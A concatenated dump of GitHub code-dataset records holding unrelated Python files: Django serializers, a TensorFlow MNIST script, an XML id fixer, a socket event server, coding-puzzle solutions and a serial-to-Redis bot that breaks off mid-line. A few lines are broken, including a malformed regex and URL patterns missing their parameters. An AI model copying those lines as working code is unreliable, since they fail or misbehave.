return '''\n Series type: {}\n Series name: {}\n Series data: {}'''.format(type(self), self.name, str(self.data))\n\n def __eq__(self, other):\n \"\"\"\n Overwrites the equal operator \n Series types or lengths are different => fail hard\n Otherwise, element-wise comparison\n \"\"\"\n if self.type != other.type:\n raise TypeError('Series have different types: {} and {}'.format(self.type, other.type))\n elif len(self.data) != len(other.data):\n raise RuntimeError('Series have different lengths')\n else:\n return self.data == other.data\n","repo_name":"ruxi09/AlternativeDataFrame","sub_path":"generic_series.py","file_name":"generic_series.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29912375577","text":"\nimport re\ndef most_common_words(text, n):\n lst, d = re.findall(r\"\\b\\w+\\b\", text.lower()), dict()\n for w in lst:\n if w in d:\n d[w] += 1\n else:\n d[w] = 1\n lst_d = sorted([(k, v) for k, v in d.items()],\n key=lambda tpl: (-tpl[1], lst.index(tpl[0])))\n return {t[0]: t[1] for t in lst_d[:min(n, len(lst_d))]}\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"5pYkwf948KBQ3pNwz_11.py","file_name":"5pYkwf948KBQ3pNwz_11.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36658944177","text":"import re\nimport os\nimport sys\nfrom typing import List\n\n\ndef repair_ids(text: str) -> str:\n # replace id's in tags with explicit xml:id value, if it starts with digit\n text = re.sub(r'<([a-zA-Z_][A-Za-z-_.]*?) ([^<^>]?xml:id=\")([0-9].*?\")', \"<\\g<1> \\g<2>\\g<1>\\g<3>\", text)\n\n # replace id's in text @corresp tags, if it starts with digit\n text = re.sub(r'(#p\\g<2>\", text)\n return text\n\n\ndef check_arguments(arguments: List[str]) -> None:\n if len(arguments) != 2:\n raise Exception(\"ERROR: Incorrect number of arguments.\")\n elif not type(arguments[1]) is str or not os.path.isdir(arguments[1]):\n raise TypeError(\"Expected directory path as command line argument.\")\n\n\ndef repair(source_dir: str) -> None:\n files = os.listdir(source_dir)\n\n for filename in files:\n if os.path.isfile(os.path.join(source_dir, filename)):\n source_text = load_text(source_dir, filename)\n if source_text:\n text_to_write = repair_ids(source_text)\n save_xml(text_to_write, filename, source_dir)\n\n\ndef load_text(directory: str, filename: str) -> str:\n file_path = os.path.join(directory, filename)\n text = \"\"\n try:\n with open(file_path) as file:\n text = file.read()\n except OSError:\n print(\"Couldn't open {} file.\".format(filename), file=sys.stderr)\n\n return text or None\n\n\ndef save_xml(text_to_write: str, filename: str, target_dir: str) -> None:\n # filename_to_write = filename + \"_id_corected\" + \".xml\"\n write_directory = os.path.abspath(os.path.join(target_dir, os.path.pardir, \"id_corrected\"))\n\n try:\n os.makedirs(write_directory)\n except FileExistsError:\n pass\n except PermissionError:\n raise PermissionError(\"Cannot create directory {}. Check permissions.\".format(write_directory))\n\n try:\n with open(os.path.join(write_directory, filename), 'w') as file:\n file.write(text_to_write)\n except OSError:\n print(\"Couldn't open {} file.\".format(filename), file=sys.stderr)\n\n\ndef main(argv: List[str]) -> None:\n check_arguments(argv)\n dir_to_repair = argv[1]\n repair(dir_to_repair)\n\n\nif __name__ == '__main__':\n main(sys.argv)\n","repo_name":"providedh/depositions-text-injection","sub_path":"src/depositions_text_injection/repair_wrong_xml_id.py","file_name":"repair_wrong_xml_id.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28802812537","text":"from rest_framework import serializers\nfrom .models import Reserva\nfrom .models import Conductor\nfrom .models import Vehiculo\nfrom .models import Pasajero\nfrom .models import Ruta\nfrom .models import Grupo\nfrom .models import Viaje\nfrom datetime import datetime, timedelta, date\nfrom django.db.models import Sum\n\n\nclass VehiculoSerializer(serializers.ModelSerializer):\n class Meta:\n model = Vehiculo\n fields = '__all__'\n\nclass ConductorSerializer(serializers.ModelSerializer):\n class Meta:\n model = Conductor\n fields = '__all__'\n\nclass ReservaSerializer(serializers.ModelSerializer):\n class Meta:\n model = Reserva\n fields = '__all__'\n \nclass PasajeroSerializer(serializers.ModelSerializer):\n class Meta:\n model = Pasajero\n fields = '__all__'\n\nclass RutaSerializer(serializers.ModelSerializer):\n class Meta:\n model = Ruta\n fields = '__all__'\n\nclass GrupoSerializer(serializers.ModelSerializer):\n class Meta:\n model = Grupo\n fields = '__all__'\n\nclass ReservaSerializer(serializers.ModelSerializer):\n class Meta:\n model = Reserva\n fields = '__all__'\n \nclass ViajeSerializer(serializers.ModelSerializer):\n class Meta:\n model = Viaje\n fields = '__all__'\n \n\nclass ReservaCreateSerializer(serializers.Serializer):\n def to_representation(self, instance):\n # Este método controla cómo se representan los objetos de reserva en el JSON\n return {\n 'id': instance.id,\n 'DNI': instance.FK_Pasajero.DNI,\n 'NombreRuta': instance.FK_Viaje.FK_Ruta.Nombre,\n 'FechaReserva': instance.Fecha\n }\n \n DNI = serializers.IntegerField()\n NombreRuta = serializers.CharField()\n \n def validate(self, data):\n # verificar que el pasajero exista\n if not Pasajero.objects.filter(DNI=data['DNI']).exists():\n raise serializers.ValidationError(\"El pasajero no existe\")\n\n # buscar la ruta por nombre\n try:\n ruta = Ruta.objects.get(Nombre=data['NombreRuta'])\n except Ruta.DoesNotExist:\n raise serializers.ValidationError(\"La ruta especificada no existe\")\n \n # verificar que existe un viaje para la fecha del día siguiente\n try:\n viaje = Viaje.objects.get(FK_Ruta_id=ruta.id, FechaViaje__date=date.today() + timedelta(days=1))\n except Viaje.DoesNotExist:\n raise serializers.ValidationError(\"No hay un viaje programado para la ruta especificada el día siguiente\")\n \n # verificar que existe el grupo\n try:\n grupo = Grupo.objects.get(FK_Ruta=ruta.id)\n except Grupo.DoesNotExist:\n raise serializers.ValidationError(\"No existe Grupo\")\n \n # calcular la capacidad de la ruta\n capacidad_total = Vehiculo.objects.filter(grupo__FK_Ruta=grupo.id).aggregate(total_capacidad=Sum('Capacidad'))['total_capacidad']\n \n if Reserva.objects.filter(FK_Viaje_id=viaje.id).count() >= capacidad_total:\n raise serializers.ValidationError(\"La ruta está llena\")\n\n return data\n\n def create(self, validated_data):\n pasajero = Pasajero.objects.get(DNI=validated_data['DNI'])\n ruta = Ruta.objects.get(Nombre=validated_data['NombreRuta'])\n viaje = Viaje.objects.filter(FK_Ruta=ruta, FechaViaje__date=date.today() + timedelta(days=1)).first()\n\n reserva = Reserva.objects.create(FK_Viaje=viaje, FK_Pasajero=pasajero, Fecha=datetime.now())\n \n return reserva\n \n\n\n \n\n\n\n","repo_name":"secamc93/Reservaz","sub_path":"Backend/rz/app1/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21861455845","text":"#!/usr/bin python\n\nimport os\nimport errno\nfrom datetime import datetime\nfrom socket import error as sock_error\n\nfrom Server import Server\nfrom Event import Event\n\nclass EventConsumer(Server):\n\n\tdef __init__(self, config, buffSize=1024):\n\t\tServer.__init__(self, config[\"eventServer\"][\"ipAddress\"], \n\t\t\tconfig[\"eventServer\"][\"port\"], buffSize)\n\t\tself.dbConfig = config[\"dbSettings\"]\n\t\tself.running = True\n\t\tself.mediaDir = \"media/\"\n\t\tif not os.path.isdir(self.mediaDir):\n\t\t\tos.makedirs(self.mediaDir)\n\n\t\tprint(\"Event Consumer Server started...\")\n\t\t\n\n\tdef getACK(self, eType, seq = None):\n\t\tack = []\n\t\tack.append(3 << 6) # event ACK packet type\n\t\tack[0] = ack[0] | (eType << 4) # type of event acked\n\t\tack.extend([0 for _ in range(0,3)]) # add 3 bytes of padding\n\n\t\tif isinstance(seq, int):\n\t\t\tif seq <= 0xFFFFFFFF and seq >= 0:\n\t\t\t\tack.append(seq >> 24)\n\t\t\t\tack.append((seq & 0x00FF0000) >> 16)\n\t\t\t\tack.append((seq & 0x0000FF00) >> 8)\n\t\t\t\tack.append(seq & 0x000000FF)\n\t\t\telse:\n\t\t\t\tprint(\"Invalid sequence number %i\" % seq)\n\n\t\treturn bytes(ack)\n\n\n\tdef getHBResponse(self):\n\t\tresByte = 1 << 6 # heartbeat packet type\n\t\tresByte = resByte | (2 << 4) # response heartbeat type\n\n\t\tif self.running:\n\t\t\tresByte = resByte | 1 # 1 for alive\n\n\t\treturn bytes([resByte])\n\n\n\tdef getImageName(self):\n\t\tfilename = \"\"\n\t\tfor i in range(0, 10000):\n\t\t\tfilename = \"img%04d.jpg\" % i\n\t\t\tif not os.path.exists(self.mediaDir + filename):\n\t\t\t\tbreak\n\n\t\treturn filename\n\n\n\tdef consumeEvents(self):\n\t\twhile self.running:\n\t\t\tself.sock.listen(0)\n\t\t\tcSock, cAddr = self.sock.accept()\n\t\t\t#print(\"[Event Consumer] Accepted connection from %s.\" % str(cAddr))\n\t\t\tconnAlive = True\n\t\t\tevent = []\n\t\t\tpictureSize = None\n\t\t\tfilename = None\n\n\t\t\ttimeStarted = datetime.now();\n\t\t\ttry:\n\t\t\t\twhile connAlive:\n\t\t\t\t\tdata = cSock.recv(self.buffSize)\n\n\t\t\t\t\tevent.extend(data)\n\n\t\t\t\t\tif (event[0] >> 6) == 1: # heartbeat message\n\t\t\t\t\t\tconnAlive = False\n\n\t\t\t\t\tif (event[0] & 0x0F) == 0: # no picture (should be exactly 8 bytes)\n\t\t\t\t\t\tif len(event) >= 8:\n\t\t\t\t\t\t\tconnAlive = False\n\t\t\t\t\telif len(event) >= 12:\n\t\t\t\t\t\tpictureSize = event[8] << 24\n\t\t\t\t\t\tpictureSize = pictureSize | (event[9] << 16)\n\t\t\t\t\t\tpictureSize = pictureSize | (event[10] << 8)\n\t\t\t\t\t\tpictureSize = pictureSize | event[11]\n\n\t\t\t\t\t\tif len(event) >= pictureSize + 12:\n\t\t\t\t\t\t\tconnAlive = False\n\n\t\t\t\t# Organize event data\n\t\t\t\ttimeReceived = datetime.now()\n\t\t\t\tpacketType = event[0] >> 6\n\n\t\t\t\tif packetType == 1: # heartbeat\n\t\t\t\t\thbType = (event[0] & 0x30) >> 4;\n\t\t\t\t\thbMessage = event[0] & 0x0F;\n\n\t\t\t\t\t# Heartbeat Type: 1=Request, 2=Response\n\t\t\t\t\tif hbType == 1:\n\t\t\t\t\t\tcSock.send(self.getHBResponse())\n\t\t\t\t\t\tcSock.close()\n\n\t\t\t\telif packetType == 2: # event\n\n\t\t\t\t\teventType = (event[0] & 0x30) >> 4\n\t\t\t\t\t\n\t\t\t\t\tseqNum = event[4] << 24\n\t\t\t\t\tseqNum = seqNum | (event[5] << 16)\n\t\t\t\t\tseqNum = seqNum | (event[6] << 8)\n\t\t\t\t\tseqNum = seqNum | event[7]\n\n\t\t\t\t\t# this is (I think) the earliest we can ACK the event\n\t\t\t\t\tcSock.send(self.getACK(eventType, seqNum))\n\t\t\t\t\tcSock.close()\n\n\t\t\t\t\te = Event(self.dbConfig, eventType, timeStarted, timeReceived, seqNum)\n\n\t\t\t\t\tuserID = event[1] >> 8\n\t\t\t\t\tuserID = userID | (event[2] & 0x0FF)\n\t\t\t\t\te.setUser(userID)\n\n\t\t\t\t\tsensors = [ False for _ in range(0,8) ]\n\t\t\t\t\tsensors[0] = ((event[3] & 128) >> 7) == 1\n\t\t\t\t\tsensors[1] = ((event[3] & 64) >> 6) == 1\n\t\t\t\t\tsensors[2] = ((event[3] & 32) >> 5) == 1\n\t\t\t\t\tsensors[3] = ((event[3] & 16) >> 4) == 1\n\t\t\t\t\tsensors[4] = ((event[3] & 8) >> 3) == 1\n\t\t\t\t\tsensors[5] = ((event[3] & 4) >> 2) == 1\n\t\t\t\t\tsensors[6] = ((event[3] & 2) >> 1) == 1\n\t\t\t\t\tsensors[7] = (event[3] & 1) == 1\n\t\t\t\t\te.setSensor(sensors)\n\n\t\t\t\t\tpictureType = event[0] & 0x0F\n\t\t\t\t\tif pictureSize:\n\t\t\t\t\t\tfilename = self.getImageName()\n\t\t\t\t\t\twith open(self.mediaDir + filename, 'wb') as f:\n\t\t\t\t\t\t\tfor i in range(0, pictureSize - 1):\n\t\t\t\t\t\t\t\tf.write(bytes([event[12 + i]]))\n\t\t\t\t\t\te.setImage(pictureType, pictureSize, filename)\n\n\t\t\t\t\t# Store record in db then print info to console\n\t\t\t\t\te.storeEvent()\n\t\t\t\t\tprint(e)\n\n\n\t\t\texcept sock_error as err:\n\t\t\t\tif err.errno != errno.ECONNRESET:\n\t\t\t\t\tprint(\"[Event Consumer] An unexpected socket error occured.\")\n\t\t\t\t\tprint(err)\n\t\t\t\telse:\n\t\t\t\t\tprint(\"[Event Consumer] Connection was reset, resuming to allow new connections.\")\n\t\t\t\t\tprint(\"[Event Consumer] %i bytes received before reset.\" % len(event))\n\n\n\n\n","repo_name":"BallisticBuddha/HomeSecurityProject","sub_path":"HSS_Server/EventConsumer.py","file_name":"EventConsumer.py","file_ext":"py","file_size_in_byte":4278,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"20710829861","text":"from django.urls import path\r\nfrom . import views\r\n\r\nurlpatterns = [\r\n path(\"\", views.starting_page, name=\"starting-page\"),\r\n path(\"new-car\", views.add_car, name=\"add-car\"),\r\n path('car/', views.car_details, name=\"car-detail\"),\r\n path('car/delete/', views.delete_car, name='delete-car'),\r\n path('refuel', views.refuel, name='refuel-car'),\r\n path('report', views.report, name='report'),\r\n path('service/done/', views.service_done, name=\"service-done\"),\r\n path('services', views.services, name=\"services\"),\r\n\r\n path('register', views.register_user, name=\"register\"),\r\n path('login', views.login_user, name=\"login\"),\r\n path('logout', views.logout_user, name=\"logout\"),\r\n \r\n]\r\n","repo_name":"kevinowski/fleet-management","sub_path":"cars/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71347364250","text":"#https://www.acmicpc.net/problem/18111\nimport sys\n\nN, M, B = map(int, sys.stdin.readline().split())\nground = []\nfor i in range(N):\n ground.extend(list(map(int, sys.stdin.readline().split())))\n\nmin_time = float('inf')\nmax_block = 0\n\nfor target_height in range(0, 257):\n time = 0\n block_needed = 0\n block_save = 0\n for height in ground:\n if height > target_height:\n time += (height - target_height) * 2\n block_save += height - target_height \n elif height < target_height:\n time += target_height - height\n block_needed += target_height - height\n if block_save + B < block_needed:\n continue\n if time < min_time:\n min_time = time\n max_block = target_height\n elif time == min_time:\n max_block = max(target_height, max_block)\nprint(min_time, max_block)\n\n#https://www.acmicpc.net/problem/11723\nclass Set():\n def __init__(self):\n self.s = {}\n for i in range(1, 21):\n self.s[i] = False\n \n def ft_add(self, x):\n self.s[x] = True\n \n def ft_remove(self, x):\n self.s[x] = False\n \n def ft_check(self, x):\n if self.s[x]:\n print(1)\n else:\n print(0)\n \n def ft_toggle(self, x):\n if self.s[x]:\n self.s[x] = False\n else:\n self.s[x] = True\n \n def ft_all(self):\n for i in range(1, 21):\n self.s[i] = True\n \n def ft_empty(self):\n for i in range(1, 21):\n self.s[i] = False\n\nimport sys\n\nM = int(input())\n\ns = Set()\nfor i in range(0, M):\n command = list(map(str, sys.stdin.readline().split()))\n if command[0] == \"add\":\n s.ft_add(int(command[1]))\n elif command[0] == \"check\":\n s.ft_check(int(command[1]))\n elif command[0] == \"remove\":\n s.ft_remove(int(command[1]))\n elif command[0] == \"toggle\":\n s.ft_toggle(int(command[1]))\n elif command[0] == \"all\":\n s.ft_all()\n elif command[0] == \"empty\":\n s.ft_empty()\n\n#https://www.acmicpc.net/problem/11399\nimport sys\n\nN = int(input())\ntime = list(map(int, sys.stdin.readline().split()))\ntime.sort()\n\nmin_time = 0\nfor i in range(len(time)):\n min_time += time[i] * (len(time) - i)\nprint(min_time)\n\n#https://www.acmicpc.net/problem/17219\nimport sys\n\nN, M = map(int, sys.stdin.readline().split())\npasswords = {}\nfor i in range(N):\n site, password = map(str, sys.stdin.readline().strip().split())\n passwords[site] = password\n\nfor i in range(M):\n site = sys.stdin.readline().strip()\n print(passwords[site])","repo_name":"SUNMI-KIM/algorithm_workbook","sub_path":"backjoon/2023_05_25.py","file_name":"2023_05_25.py","file_ext":"py","file_size_in_byte":2590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6884184127","text":"from sregistry.logger import bot\nfrom sregistry.main import ApiConnection\nimport json\nimport os\n\nfrom retrying import retry\nimport google\nimport platform\nfrom google.cloud import storage\nfrom googleapiclient.discovery import build as discovery_build\nfrom oauth2client.client import GoogleCredentials\n\nfrom .build import (\n build,\n build_repo,\n build_status,\n run_build,\n finish_build,\n submit_build,\n load_build_config,\n)\nfrom .delete import delete, destroy\nfrom .logs import logs, list_logs, print_log\nfrom .pull import pull\nfrom .push import push, upload\nfrom .query import container_query, list_containers, search, search_all\n\n\nclass Client(ApiConnection):\n # Custom variables that can be provided with client.get_client\n envars = {}\n\n def __init__(self, secrets=None, base=None, init=True, **kwargs):\n self._update_secrets()\n self._update_headers()\n\n # Do we need storage client now?\n if init is True:\n self._init_client()\n\n super(Client, self).__init__(**kwargs)\n\n def _speak(self):\n \"\"\"add the bucket name to be printed to the user at appropriate times\"\"\"\n bot.info(\"[bucket][%s]\" % self._bucket_name)\n\n def _update_secrets(self):\n \"\"\"The user is required to have an application secrets file in his\n or her environment. The information isn't saved to the secrets\n file, but the client exists with error if the variable isn't found.\n \"\"\"\n env = \"GOOGLE_APPLICATION_CREDENTIALS\"\n self._secrets = self._get_and_update_setting(env, self.envars.get(env))\n if not self._secrets:\n bot.exit(\"You must export %s to use Google Storage client\" % env)\n\n def _init_client(self):\n \"\"\"init client will check if the user has defined a bucket that\n differs from the default, use the application credentials to\n get the bucket, and then instantiate the client.\n \"\"\"\n\n # Get storage and compute services\n self._get_services()\n\n env = \"SREGISTRY_GOOGLE_STORAGE_BUCKET\"\n self._bucket_name = self._get_and_update_setting(env, self.envars.get(env))\n\n # If the user didn't set in environment, use default\n if not self._bucket_name:\n fallback_name = os.environ.get(\"USER\", platform.node())\n self._bucket_name = \"sregistry-gcloud-build-%s\" % fallback_name\n\n # The build bucket is for uploading .tar.gz files\n self._build_bucket_name = \"%s_cloudbuild\" % self._bucket_name\n\n # Main storage bucket for containers, and dependency bucket with targz\n self._bucket = self._get_bucket(self._bucket_name)\n self._build_bucket = self._get_bucket(self._build_bucket_name)\n\n def _get_services(self, version=\"v1\"):\n \"\"\"get version 1 of the google compute and storage service\n\n Parameters\n ==========\n version: version to use (default is v1)\n \"\"\"\n self._bucket_service = storage.Client()\n creds = GoogleCredentials.get_application_default()\n self._storage_service = discovery_build(\"storage\", version, credentials=creds)\n self._build_service = discovery_build(\"cloudbuild\", version, credentials=creds)\n\n def _get_bucket(self, bucket_name):\n \"\"\"get a bucket based on a bucket name. If it doesn't exist, create it.\n\n Parameters\n ==========\n bucket_name: the name of the bucket to get (or create). It should\n not contain google, and should be all lowercase with -\n or underscores.\n \"\"\"\n\n # Case 1: The bucket already exists\n try:\n bucket = self._bucket_service.get_bucket(bucket_name)\n\n # Case 2: The bucket needs to be created\n except google.cloud.exceptions.NotFound:\n bucket = self._bucket_service.create_bucket(bucket_name)\n\n # Case 2: The bucket name is already taken\n except:\n bot.exit(\"Cannot get or create %s, is the name taken?\" % bucket_name)\n\n return bucket\n\n def _get_project(self, project=None):\n \"\"\"get project returns the active project, and exists if not found.\n\n Parameters\n ==========\n project: a project to default to, if not found in the environment\n zone: a default zone, will be us-west1-a by default\n\n \"\"\"\n if project is None:\n project = self.envars.get(\"SREGISTRY_GOOGLE_PROJECT\")\n\n return self._get_and_update_setting(\"SREGISTRY_GOOGLE_PROJECT\", project)\n\n def _get_zone(self, zone=\"us-west1-a\"):\n \"\"\"get zone returns the zone set in the environment, or the default\n\n Parameters\n ==========\n zone: a default zone, will be us-west1-a by default\n\n \"\"\"\n return self._get_and_update_setting(\"SREGISTRY_GOOGLE_ZONE\", zone)\n\n\nClient.pull = pull\nClient.push = push\nClient._upload = upload\nClient.delete = delete\nClient.destroy = destroy\n\n# Build functions\nClient.build = build\nClient.build_repo = build_repo\nClient._run_build = run_build\nClient._finish_build = finish_build\nClient._build_status = build_status\nClient._submit_build = submit_build\nClient._load_build_config = load_build_config\n\nClient.search = search\nClient._search_all = search_all\nClient._container_query = container_query\nClient._list_containers = list_containers\n","repo_name":"singularityhub/sregistry-cli","sub_path":"sregistry/main/google_build/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5339,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"32"} +{"seq_id":"71882989852","text":"import tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import datasets\nimport os\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' # 只打印Error信息,0:全部打印\n\n# 手动实现前向传播过程\n# ================ step1 data prepared ================\n# datasets:keras提供的管理数据的工具\n# x: [60k, 28, 28],\n# y: [60k]\n(x, y), (x_test, y_test) = datasets.mnist.load_data()\n# numpy 2 tensor\n# x: [0~255] => [0~1.]\nx = tf.convert_to_tensor(x, dtype=tf.float32) / 255. # -1~1的范围更好优化\ny = tf.convert_to_tensor(y, dtype=tf.int32)\nx_test = tf.convert_to_tensor(x_test, dtype=tf.float32) / 255. # -1~1的范围更好优化\ny_test = tf.convert_to_tensor(y_test, dtype=tf.int32)\nprint(x.shape, x.dtype)\nprint(y.shape, y.dtype)\nprint(tf.reduce_min(x), tf.reduce_max(x))\nprint(tf.reduce_min(y), tf.reduce_max(y))\n\n# 创建数据集,方便一次取一个batch\ntrain_db = tf.data.Dataset.from_tensor_slices((x, y)).batch(128)\ntest_db = tf.data.Dataset.from_tensor_slices((x_test, y_test)).batch(128)\n# 窥探train_db\ntrain_iter = iter(train_db)\nprint(train_iter)\nsample = next(train_iter) # 拿出其中一个batch训练集,(samples,labels) => ([b,28,28],[b])\nprint('one batch:', sample[0].shape, sample[1].shape)\n# 窥探train_db\n\n# ================ step2 create variables ================\n# model : [b, 784] => [b, 256] => [b, 128] => [b, 10]\n# 声明可训练参数。必须要有tf.Variable()来包装,否则求变量梯度时,其梯度值不会被保留\n# w:[dim_in, dim_out], b:[dim_out]\nw1 = tf.Variable(tf.random.truncated_normal([784, 256], stddev=0.1)) # 初始值非常重!!若初始权重很大,将导致发散,或者收敛很慢,建议选择很小的初始权重值。\nb1 = tf.Variable(tf.zeros([256]))\nw2 = tf.Variable(tf.random.truncated_normal([256, 128], stddev=0.1))\nb2 = tf.Variable(tf.zeros([128]))\nw3 = tf.Variable(tf.random.truncated_normal([128, 10], stddev=0.1))\nb3 = tf.Variable(tf.zeros([10]))\n\nlr = 1e-3 # 学习率\n\n# ================ step3 build and train model ================\nfor epoch in range(50): # iterate db for 10。因为每次都是在相同训练集上训练,故最后能达到的优化效果是由上限的,深度学习的核心还是Big Data\n for step, (x, y) in enumerate(train_db): # step:第几批batch\n # x:[128, 28, 28]\n # y: [128]\n # [b, 28, 28] => [b, 28*28]\n x = tf.reshape(x, [-1, 28 * 28]) # 因为第一层是全连接层,节点为一维向量,需要预处理图像平展为一维向量输入\n\n with tf.GradientTape() as tape: # 自动求解参数梯度的环境\n # x: [b, 28*28]\n # h1 = x@w1 + b1\n # [b, 784]@[784, 256] + [256] => [b, 256] + [256] => [b, 256] + [b, 256]\n h1 = x @ w1 + b1 # 自动Broadcasting + tf.broadcast_to(b1,[x.shape[0],256])\n h1 = tf.nn.relu(h1)\n # [b, 256] => [b, 128]\n h2 = h1 @ w2 + b2\n h2 = tf.nn.relu(h2)\n # [b, 128] => [b, 10]\n out = h2 @ w3 + b3 # 最后一层一般不用或用sigmoid\n\n # ================ step4 compute loss ================\n # out: [b, 10]\n # y: [b] => [b, 10]\n y_onehot = tf.one_hot(y, depth=10) # depth为分类类别。因为训练时需要最小化loss,而loss的计算基于one-hot的,故训练时需要one-hot,测试、验证时不需要\n # mse = mean(sum(y-out)^2)\n # [b, 10]\n loss = tf.square(y_onehot - out)\n loss = tf.reduce_mean(loss) # ==> loss 矩阵求和再 除以 b*10,变为标量\n\n # ================ step5 compute variables ================\n grads = tape.gradient(loss, [w1, b1, w2, b2, w3, b3])\n # ================ step6 update gradients ================\n # w1 = w1 - lr * w1_grad\n w1.assign_sub(lr * grads[0]) # 注意这里不能使用 w1 = w1 - lr*grads[0] ,这将导致w1又变成 tensor而非Variable,以后无法记录梯度\n b1.assign_sub(lr * grads[1])\n w2.assign_sub(lr * grads[2])\n b2.assign_sub(lr * grads[3])\n w3.assign_sub(lr * grads[4])\n b3.assign_sub(lr * grads[5])\n\n if step % 100 == 0:\n print(epoch, step, 'loss:', float(loss))\n\n # test/evaluation:在当前参数下测试、验证模型的准确率。前向过程与训练时一样,只是无需计算loss,无需对y_test one-hot编码\n # [w1, b1, w2, b2, w3, b3]\n total_correct, total_num = 0, 0\n for step, (x, y) in enumerate(test_db):\n # y:直接的分类类别\n # 预处理,将图像展平 [b, 28, 28] => [b, 28*28]\n x = tf.reshape(x, [-1, 28 * 28])\n # 前向过程 [b, 784] => [b, 256] => [b, 128] => [b, 10]\n h1 = tf.nn.relu(x @ w1 + b1)\n h2 = tf.nn.relu(h1 @ w2 + b2)\n out = h2 @ w3 + b3\n # out: [b, 10] ~ R\n # prob: [b, 10] ~ [0, 1]\n # 将输出转为概率值\n prob = tf.nn.softmax(out, axis=1) # 同时softmax保证概率和为1\n # [b, 10] => [b]\n # int64!!!\n # 预测类别,与y比较\n pred = tf.argmax(prob, axis=1)\n pred = tf.cast(pred,dtype=tf.int32) # 需要类型转换。因为y是int32,否则无法tf.equal()\n correct = tf.reduce_sum(tf.cast(tf.equal(pred, y),dtype=tf.int32))\n\n total_correct += int(correct) # tensor --> python int\n total_num += x.shape[0]\n\n acc = total_correct / total_num\n print(\"test acc:\", acc)\n","repo_name":"tp-yan/PycharmProject","sub_path":"ForTensorFlow2/05DataLoad/03evaluate_acc.py","file_name":"03evaluate_acc.py","file_ext":"py","file_size_in_byte":5508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10280567453","text":"from nltk import FreqDist\nfrom nltk.corpus import words\n\npuzzle_letters = FreqDist('egivrvonl')\n\nobligatory = 'r'\n\nwordlist = words.words()\n\nresult = [w for w in wordlist if len(w) > 5 and obligatory in w and FreqDist(w) <= puzzle_letters]\n\nprint(result)\n","repo_name":"katalogoc/librarian","sub_path":"src/egivrvonl.py","file_name":"egivrvonl.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"25163183446","text":"#!/usr/bin/env python3\n\nimport time, serial\nimport threading as th\nimport configparser as cp\n# -- system --\nfrom core.utils import sysUtils\nfrom core.redisOps import redisOps\nfrom core.logutils import logUtils\nfrom core.meterInfoData import meterInfoData\nfrom ommslib.shared.core.datatypes import redisDBIdx, readStatus\n\n\nclass pzemRedisBot(th.Thread):\n\n def __init__(self, SYS_INI: cp.ConfigParser, redops: redisOps):\n super().__init__()\n self.sys_ini: cp.ConfigParser = SYS_INI\n self.sec: cp.SectionProxy = self.sys_ini[\"PZEM\"]\n self.dev: str = self.sec.get(\"SERIAL_DEV\", \"/dev/ttyUSB0\")\n self.baudrate: int = self.sec.getint(\"SERIAL_BAUDRATE\", 19200)\n self.syspath_channel = self.sec.get(\"SYSPATH_CHANNEL\")\n tmp: str = self.sec.get(\"DIAG_TAG\")\n self.diag_tag = sysUtils.set_systag(tmp)\n self.ser: serial.Serial = serial.Serial(port=self.dev, baudrate=self.baudrate)\n self.redops: redisOps = redops\n self.start_dts_dts_utc = sysUtils.dts_utc()\n self.last_msg_dts_utc = \"\"\n self.m_info: meterInfoData = \\\n meterInfoData(\"e1\", \"Peacefair\", \"PZEM-004T AC 100A\")\n self.first_reads: [] = []\n\n def run(self):\n pub_channel: str = self.sec.get(\"REDIS_PUB_CHNL\")\n pub_channel = sysUtils.set_systag(pub_channel)\n _dict = {\"boot_dts_utc\": sysUtils.dts_utc(), \"dev\": self.dev\n , \"lan_ip\": sysUtils.lan_ip(), \"hostname\": sysUtils.HOST\n , \"pub_reads_channel\": pub_channel}\n self.redops.update_edge_diag(self.diag_tag, mapdct=_dict, restart=True)\n while True:\n self.__run_loop()\n\n def __read_string(self) -> str:\n barr: bytearray = bytearray()\n while True:\n __char = self.ser.read()\n # -- start char --\n if chr(__char[0]) == '#':\n barr.clear()\n barr.extend(__char)\n # -- test end --\n if chr(__char[0]) == '!':\n break\n # -- --\n return barr.decode(\"utf-8\")\n\n def __run_loop(self):\n try:\n # -- -- -- -- -- -- -- -- -- -- -- --\n CHANNEL = \"PZEM\"\n buff = None\n time.sleep(0.48)\n if self.ser.inWaiting():\n buff = self.__read_string()\n # -- -- -- -- -- -- -- -- -- -- -- --\n if buff is None:\n return\n # -- -- -- -- -- -- -- -- -- -- -- --\n if buff.startswith(\"#\") and buff.endswith(\"!\"):\n __dict = {\"last_msg_dts_utc\": sysUtils.dts_utc(), \"last_msg\": buff}\n self.redops.update_edge_diag(diag_tag=self.diag_tag, mapdct=__dict)\n # -- -- -- -- -- -- -- -- -- -- -- --\n print(buff)\n if not buff.startswith(\"#RPT|PZEM:SS_\"):\n return\n # -- -- -- -- -- -- -- -- -- -- -- --\n arr: [] = buff.split(\"|\")\n arr[0] = \"#RPT:kWhrs\"\n pzem_ss = arr[1].split(\":\")[1]\n arr.insert(1, f\"DTSUTC:{sysUtils.dts_utc()}\")\n arr.insert(2, 